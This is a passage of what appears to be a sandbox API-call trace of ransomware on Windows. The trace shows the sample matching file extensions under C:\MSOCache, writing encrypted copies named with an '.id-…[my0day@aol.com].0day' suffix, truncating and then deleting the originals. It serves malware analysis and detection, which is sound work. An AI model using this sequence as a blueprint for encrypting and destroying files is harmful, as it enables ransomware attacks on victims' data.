(lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.618] lstrlenW (lpString=".zip") returned 4 [0035.618] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.618] lstrlenW (lpString=".rar") returned 4 [0035.618] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString=".bz2") returned 4 [0035.618] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString=".7z") returned 3 [0035.618] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.618] lstrlenW (lpString=".dbf") returned 4 [0035.618] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.618] lstrlenW (lpString=".1cd") returned 4 [0035.618] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.618] lstrlenW (lpString=".jpg") returned 4 [0035.618] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.618] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.618] lstrlenW (lpString="Setup.xml") returned 9 [0035.618] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.619] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=9352) returned 1 [0035.619] CloseHandle (hObject=0x170) returned 1 [0035.619] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.619] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.619] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.619] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.619] GetLastError () returned 0x0 [0035.620] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x2488, lpOverlapped=0x0) returned 1 [0035.670] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0035.671] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.671] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.671] SetEndOfFile (hFile=0x18c) returned 1 [0035.671] CloseHandle (hObject=0x18c) returned 1 [0035.672] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.672] SetEndOfFile (hFile=0x170) returned 1 [0035.673] CloseHandle (hObject=0x170) returned 1 [0035.673] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.673] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.673] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.673] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.673] lstrlenW (lpString=".doc") returned 4 [0035.673] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.673] lstrlenW (lpString=".docx") returned 5 [0035.673] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.673] lstrlenW (lpString=".pdf") returned 4 [0035.673] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.673] lstrlenW (lpString=".xls") returned 4 [0035.673] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.673] lstrlenW (lpString=".xlsx") returned 5 [0035.673] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.673] lstrlenW (lpString=".ppt") returned 4 [0035.673] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.673] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString=".zip") returned 4 [0035.674] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.674] lstrlenW (lpString=".rar") returned 4 [0035.674] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".bz2") returned 4 [0035.674] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".7z") returned 3 [0035.674] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString=".dbf") returned 4 [0035.674] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString=".1cd") returned 4 [0035.674] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString=".jpg") returned 4 [0035.674] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString=".doc") returned 4 [0035.674] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".docx") returned 5 [0035.674] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.674] lstrlenW (lpString=".pdf") returned 4 [0035.674] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".xls") returned 4 [0035.674] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".xlsx") returned 5 [0035.674] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.674] lstrlenW (lpString=".ppt") returned 4 [0035.674] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.674] lstrlenW (lpString=".zip") returned 4 [0035.674] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.675] lstrlenW (lpString=".rar") returned 4 [0035.675] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".bz2") returned 4 [0035.675] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".7z") returned 3 [0035.675] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.675] lstrlenW (lpString=".dbf") returned 4 [0035.675] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.675] lstrlenW (lpString=".1cd") returned 4 [0035.675] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.675] lstrlenW (lpString=".jpg") returned 4 [0035.675] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.675] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.675] lstrlenW (lpString="Setup.xml") returned 9 [0035.675] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.676] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2624) returned 1 [0035.676] CloseHandle (hObject=0x170) returned 1 [0035.676] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.676] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.676] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.676] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.676] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.676] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0035.676] GetLastError () returned 0x0 [0035.676] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xa40, lpOverlapped=0x0) returned 1 [0035.752] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0035.753] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.753] WriteFile (in: hFile=0x18c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.753] SetEndOfFile (hFile=0x18c) returned 1 [0035.753] CloseHandle (hObject=0x18c) returned 1 [0035.754] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.754] SetEndOfFile (hFile=0x170) returned 1 [0035.754] CloseHandle (hObject=0x170) returned 1 [0035.754] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.755] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.755] lstrlenW (lpString=".doc") returned 4 [0035.755] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.755] lstrlenW (lpString=".docx") returned 5 [0035.755] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.755] lstrlenW (lpString=".pdf") returned 4 [0035.755] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.755] lstrlenW (lpString=".xls") returned 4 [0035.755] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.755] lstrlenW (lpString=".xlsx") returned 5 [0035.755] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.755] lstrlenW (lpString=".ppt") returned 4 [0035.755] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.755] lstrlenW (lpString=".zip") returned 4 [0035.755] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.755] lstrlenW (lpString=".rar") returned 4 [0035.755] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.755] lstrlenW (lpString=".bz2") returned 4 [0035.755] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.755] lstrlenW (lpString=".7z") returned 3 [0035.755] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString=".dbf") returned 4 [0035.756] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString=".1cd") returned 4 [0035.756] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString=".jpg") returned 4 [0035.756] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString=".doc") returned 4 [0035.756] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString=".docx") returned 5 [0035.756] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.756] lstrlenW (lpString=".pdf") returned 4 [0035.756] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString=".xls") returned 4 [0035.756] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString=".xlsx") returned 5 [0035.756] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.756] lstrlenW (lpString=".ppt") returned 4 [0035.756] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString=".zip") returned 4 [0035.756] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.756] lstrlenW (lpString=".rar") returned 4 [0035.756] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString=".bz2") returned 4 [0035.756] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.756] lstrlenW (lpString=".7z") returned 3 [0035.756] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.756] lstrlenW (lpString=".dbf") returned 4 [0035.757] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.757] lstrlenW (lpString=".1cd") returned 4 [0035.757] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.757] lstrlenW (lpString=".jpg") returned 4 [0035.757] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.757] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.757] lstrlenW (lpString="ProPlusrWW.xml") returned 14 [0035.757] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.774] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=16852) returned 1 [0035.782] CloseHandle (hObject=0x170) returned 1 [0035.785] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020 [0035.785] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.785] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.785] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.785] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.785] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0035.910] GetLastError () returned 0x0 [0035.910] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x41d4, lpOverlapped=0x0) returned 1 [0035.912] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0036.172] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.172] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0036.172] SetEndOfFile (hFile=0x198) returned 1 [0036.434] CloseHandle (hObject=0x198) returned 1 [0036.543] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.543] SetEndOfFile (hFile=0x170) returned 1 [0036.543] CloseHandle (hObject=0x170) returned 1 [0036.544] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.544] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0036.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.544] lstrlenW (lpString=".doc") returned 4 [0036.544] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.544] lstrlenW (lpString=".docx") returned 5 [0036.544] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.544] lstrlenW (lpString=".pdf") returned 4 [0036.544] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.544] lstrlenW (lpString=".xls") returned 4 [0036.544] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.544] lstrlenW (lpString=".xlsx") returned 5 [0036.544] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.544] lstrlenW (lpString=".ppt") returned 4 [0036.544] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.544] lstrlenW (lpString=".zip") returned 4 [0036.544] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.544] lstrlenW (lpString=".rar") returned 4 [0036.544] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString=".bz2") returned 4 [0036.545] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString=".7z") returned 3 [0036.545] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.545] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.545] lstrlenW (lpString=".dbf") returned 4 [0036.545] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.545] lstrlenW (lpString=".1cd") returned 4 [0036.545] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.545] lstrlenW (lpString=".jpg") returned 4 [0036.545] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.545] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.545] lstrlenW (lpString=".doc") returned 4 [0036.545] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString=".docx") returned 5 [0036.545] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.545] lstrlenW (lpString=".pdf") returned 4 [0036.545] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString=".xls") returned 4 [0036.545] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString=".xlsx") returned 5 [0036.545] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.545] lstrlenW (lpString=".ppt") returned 4 [0036.545] 